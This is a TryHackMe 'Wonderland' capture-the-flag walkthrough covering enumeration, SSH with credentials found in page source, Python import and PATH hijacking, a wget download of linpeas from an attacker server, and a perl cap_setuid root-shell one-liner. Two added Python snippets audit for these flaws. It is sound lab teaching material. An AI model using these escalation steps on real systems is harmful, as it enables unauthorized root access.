Wonderland - TryHackMe

Wonderland is a medium difficulty box on TryHackMe. Below are the steps taken to fully compromise this box.

First, let’s run threader3000 to see what ports are open.

Wonderland threader3000

This shows that two ports are open, 22 and 80. Let’s run nmap -A -p 22,80 [machine ip] and see what information we are able to enumerate from this scan.

Wonderland nmap

It appears that Golang is used as the web server. Visiting the website, we see a picture of a white rabbit.

Wonderland website

However, there is nothing in the source code to see. Let’s run gobuster dir -u http://[machine ip] -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 50 and see if we are able to locate any other directories.

Wonderland gobuster 1

gobuster returned a couple of results to review. The /poem subdirectory just had the poem The Jabberwocky on it, and /r told you to keep on going.

Wonderland /r

At this point, I ran gobuster dir -u http://[machine ip]/r/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 50, and it returned a subdirectory of /a.

Wonderland gobuster2

At this point, I remembered it stated to follow the White Rabbit, and since /r/a was the beginning of rabbit, I decided to try going to http://[machine ip]/r/a/b/b/i/t. This leads to a page telling you to enter wonderland, but nothing is clickable on the page.

Wonderland /r/a/b/b/i/t

I decided to take a look at the source code for the page, and it appears that there was potentially a set of hidden credentials that might be usable to SSH into the server.

Wonderland alice credentials

Let’s try to ssh into the victim with ssh alice@[machine ip].

Wonderland alice ssh

Success! We were able to connect via ssh as alice. Let’s take a look around. ls -al shows that root.txt is in this folder, but we cannot read it. Running python3 walrus_and_the_carpenter.py just returns 10 random lines of text from the script.

Wonderland alice home directory

Since root.txt is in the user folder, let’s see if the user flag is in the root folder with cat /root/user.txt. We’ve found the user flag!

Wonderland user.txt

Let’s run sudo -l and see if alice can run something as a different user. We can see that she can run python 3.6 as another user, rabbit.

Wonderland alice sudo -l

It appears that we can open python 3.6 as rabbit by running the walrus_and_the_carpenter.py script. Let’s take a look at that script first.

Wonderland walrus_and_the_carpenter.py

With Python, the directory that contains the script is searched first when resolving imports. If a file in that directory has the same name as a module the script imports, Python imports that file instead of the standard-library module. Let’s create a script file with nano random.py and put in the code below.

Wonderland random.py

Save this file and then run sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py. You should now have a shell as rabbit.

Wonderland rabbit

I attempted to run sudo -l as rabbit, but we do not have this user’s password to see what permissions they might potentially have. I navigated to rabbit’s home folder with cd /home/rabbit and ran ls -al to list the directory’s contents.

Wonderland rabbit home directory

It appears that there is a SUID file in this folder. Let’s run it and see what happens.

Wonderland teaParty

At this point you can enter whatever you would like, and the program crashes. It also appears to display some text with a time an hour ahead of the current time. Since we likely do not have any tools on this machine for analyzing the binary, let’s run nano teaParty to see if we can find anything useful in the file. We can see that the date binary is called without an absolute path, so let’s use that to our advantage.

Wonderland nano teaParty

Let’s add /tmp to rabbit’s $PATH variable with export PATH="/tmp:$PATH". This will put /tmp as the first folder that is looked at for binaries that do not have an absolute path defined.

Wonderland $PATH

Next, run cd /tmp followed by nano date. Put in the two lines of code below, which can be used to launch a bash shell.

Wonderland /tmp/date bash shell

Save and exit nano, and then run cd /home/rabbit, and run chmod +x /tmp/date to make the date file executable. Now, execute ./teaParty. This should give you a shell as hatter!

Wonderland hatter shell access
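The manual inspection of teaParty above can be automated when auditing your own SUID binaries. This added example (not from the original write-up) pulls printable strings out of a binary and flags shell command lines that call a known utility without an absolute path. The sample bytes and the KNOWN utility list are constructed assumptions.

```python
import re
import shlex

SHELL_OPERATORS = re.compile(r"&&|\|\||[;|]")


def printable_strings(blob, min_len=4):
    """ASCII runs of at least min_len bytes, like the strings utility."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def relative_commands(blob, known_commands):
    """(command, full string) pairs where a known utility is invoked without a path."""
    findings = []
    for text in printable_strings(blob):
        for segment in SHELL_OPERATORS.split(text):
            try:
                tokens = shlex.split(segment)
            except ValueError:  # unbalanced quote: plain text, not a command line
                tokens = segment.split()
            if tokens and "/" not in tokens[0] and tokens[0] in known_commands:
                findings.append((tokens[0], text))
    return findings


# Constructed sample standing in for a binary's contents; not bytes from the real file.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01\x00"
    b"Mad Hatter's tea party\x00"
    b"/bin/echo -n 'Back by ' && date --date='next hour' -R\x00"
    b"Segmentation fault (core dumped)\x00"
)
KNOWN = {"date", "cat", "cp", "id", "ls", "tar"}  # assumed list of utility names


def demo():
    return relative_commands(SAMPLE_BLOB, KNOWN)


if __name__ == "__main__":
    for command, text in demo():
        print(f"relative call to {command!r}: {text}")
```

The fix in the binary itself is to call the utility by absolute path, or to set PATH to a fixed trusted value before running any command.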

Next, let’s navigate to hatter’s home directory with cd /home/hatter and run ls -al. There is a password.txt file there. Let’s run cat password.txt.

Wonderland hatter password.txt

In another terminal window on your attacker pc, run **ssh hatter@[machine ip]** and use the password you just uncovered. You should be able to connect as hatter.

Wonderland hatter ssh

hatter is not able to run sudo -l, so I next decided to enumerate with linpeas. On my attacker computer, I ran python3 -m http.server to spin up a temporary http server.

Wonderland python3 http server

Next, I ran wget http://[attacker ip]:8000/linpeas.sh to download it locally onto the victim computer. I then ran chmod +x linpeas.sh to make it executable followed by ./linpeas.sh

Wonderland linpeas

In the middle of enumeration, it shows that perl has the cap_setuid+ep capability. This can be used to gain a root shell. Let’s take a look at GTFOBins to find a way to escalate to root. It appears you can run perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' to gain a root shell. Let’s give it a try.

Wonderland root shell

Awesome, now we just need to run cat /home/alice/root.txt to get the root flag!

Wonderland root.txt
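The cap_setuid+ep finding on perl is easy to detect on your own hosts from the output of getcap -r /. This added example (not from the original write-up) parses both getcap output styles and reports interpreters that hold cap_setuid. It generalizes from perl to a short list of interpreter names, which is an assumption, and the sample output is constructed.

```python
import os
import re

# Older getcap prints "path = caps+flags"; newer versions print "path caps=flags".
LINE = re.compile(r"^(?P<path>\S+)\s+(?:=\s+)?(?P<clauses>\S.*)$")
CLAUSE = re.compile(r"(?P<names>cap_[a-z_,]+)[+=](?P<flags>[eip]+)")
INTERPRETERS = re.compile(r"^(perl|python|ruby|php|node|lua)[\d.]*$")  # assumed list


def parse_getcap(text):
    """Map path -> {capability: flags} for both getcap output styles."""
    result = {}
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        caps = {}
        for clause in CLAUSE.finditer(m.group("clauses")):
            for name in clause.group("names").split(","):
                caps[name] = clause.group("flags")
        if caps:
            result[m.group("path")] = caps
    return result


def setuid_capable_interpreters(text):
    """Interpreters whose permitted set includes cap_setuid, sorted by path."""
    hits = []
    for path, caps in sorted(parse_getcap(text).items()):
        if "p" in caps.get("cap_setuid", "") and INTERPRETERS.match(os.path.basename(path)):
            hits.append(path)
    return hits


# Constructed sample of getcap output mixing both styles.
SAMPLE = """\
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/python3.6 cap_net_bind_service=ep
/usr/bin/ruby2.5 cap_setgid,cap_setuid=eip
"""

if __name__ == "__main__":
    for path in setuid_capable_interpreters(SAMPLE):
        print("review:", path)
```

Running setcap -r on a flagged file removes its capabilities.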